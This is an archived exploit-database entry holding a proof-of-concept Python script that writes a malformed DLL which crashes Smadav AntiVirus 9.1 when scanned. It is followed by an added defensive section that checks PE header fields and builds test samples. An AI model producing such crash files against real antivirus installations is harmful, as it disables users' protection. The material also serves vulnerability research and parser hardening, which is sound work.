Exploit Smadav Anti Virus 9.1 - Crash (PoC)

Exploiter

18 Dec 2022
EDB-ID: 22653
EDB verification: Passed
Author: MADA R PERDHANA
Vulnerability type: DOS
Platform: WINDOWS
CVE: null
Published: 2012-11-12
Code:
# Exploit Title: Smadav AntiVirus - Crash PoC
# Date: 10/Nov/2012
# Exploit Author: Mada R Perdhana ([email protected]) / Spentera Research Team
# Vendor Homepage: http://www.smadav.net & http://www.smadav.web.id
# Software Link: http://www.smadav.net/download
# Version: 9.1 (latest version; previous versions should also be affected)
# Tested on: Windows XP SP 2


The product crashes when it scans a malicious .dll generated with
this script

----python--
file = open("crash.dll","wb")
file.write("\x4d\x5a\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00\xb8\x41\x41\x41\x41\x41\x41\x41\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf0\x00\x00\x00\x0e\x1f\xba\x0e\x00\xb4\x09\xcd\x21\xb8\x01\x4c\xcd\x21\x54\x68\x69\x73\x20\x70\x72\x6f\x67\x72\x61\x6d\x20\x63\x61\x6e\x6e\x6f\x74\x20\x62\x65\x20\x72\x75\x6e\x20\x69\x6e\x20\x44\x4f\x53\x20\x6d\x6f\x64\x65\x2e\x0d\x0d\x0a\x24\x00\x00\x00\x00\x00\x00\x00\x8c\x9c\x76\x90\xc8\xfd\x18\xc3\xc8\xfd\x18\xc3\xc8\xfd\x18\xc3\x4b\xf5\x45\xc3\xcb\xfd\x18\xc3\xc8\xfd\x19\xc3\x53\xfd\x18\xc3\x46\xea\x78\xc3\xdf\xfd\x18\xc3\x46\xea\x17\xc3\x85\xfd\x18\xc3\x46\xea\x47\xc3\xc7\xff\x18\xc3\x46\xea\x44\xc3\xc9\xfd\x18\xc3\x46\xea\x46\xc3\xc9\xfd\x18\xc3\x46\xea\x42\xc3\xc9\xfd\x18\xc3\x52\x69\x63\x68\xc8\xfd\x18\xc3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x50\x45\x00\x00\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41")
file.close()
-------

The trick is to add 49 malicious bytes (represented here by \x41)
to the .dll file, right after the PE (\x50\x45) header, at the 244th byte
of the file.
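
From the scanning side, the fields that follow the PE signature have to be bounds-checked before they are used as counts or offsets. The sketch below is an added example, not part of the original advisory and not Smadav's code; the function names, the constructed sample buffers and the choice of checks are assumptions for illustration.

```python
import struct

KNOWN_MACHINES = {0x014C, 0x8664, 0x01C0, 0xAA64}  # i386, AMD64, ARM, ARM64
MAX_SECTIONS = 96        # limit enforced by the Windows loader
COFF_SIZE, SECTION_SIZE = 20, 40

def check_pe_headers(data: bytes) -> list:
    """Return a list of header problems; an empty list means the headers are plausible."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return ["missing or truncated DOS header"]
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    coff_off = e_lfanew + 4
    if coff_off + COFF_SIZE > len(data):
        return ["e_lfanew leaves no room for PE signature and COFF header"]
    if data[e_lfanew:coff_off] != b"PE\0\0":
        return ["PE signature not found at e_lfanew"]
    machine, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff_off)
    problems = []
    if machine not in KNOWN_MACHINES:
        problems.append(f"unknown Machine 0x{machine:04x}")
    if not 1 <= nsections <= MAX_SECTIONS:
        problems.append(f"implausible NumberOfSections {nsections}")
    # Every size read from the file is checked against the real file length.
    opt_off = coff_off + COFF_SIZE
    table_end = opt_off + opt_size + nsections * SECTION_SIZE
    if opt_off + opt_size > len(data):
        problems.append("optional header extends past end of file")
    elif table_end > len(data):
        problems.append("section table extends past end of file")
    elif opt_size < 2 or struct.unpack_from("<H", data, opt_off)[0] not in (0x10B, 0x20B):
        problems.append("bad optional header magic")
    return problems

def build_sample(after_signature: bytes, e_lfanew: int = 0xF0) -> bytes:
    """Constructed test input: DOS header stub + PE signature + caller-supplied bytes."""
    dos = b"MZ" + bytes(0x3A) + struct.pack("<I", e_lfanew)
    return dos + bytes(e_lfanew - len(dos)) + b"PE\0\0" + after_signature

# Constructed: same layout as the file described above, 49 filler bytes at offset 244.
MALFORMED = build_sample(b"\x41" * 49)
# Constructed: minimal plausible headers (i386 DLL, one section, 224-byte PE32 optional header).
coff = struct.pack("<HHIIIHH", 0x014C, 1, 0, 0, 0, 0xE0, 0x2102)
WELL_FORMED = build_sample(coff + struct.pack("<H", 0x10B) + bytes(0xE0 - 2 + SECTION_SIZE))

if __name__ == "__main__":
    for name, blob in (("malformed", MALFORMED), ("well-formed", WELL_FORMED)):
        print(name, check_pe_headers(blob) or "ok")
```

With the filler bytes in place, Machine, NumberOfSections and SizeOfOptionalHeader all read as 0x4141, so a parser that trusts them would index far beyond the 293-byte file.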
 
Source: www.exploit-db.com
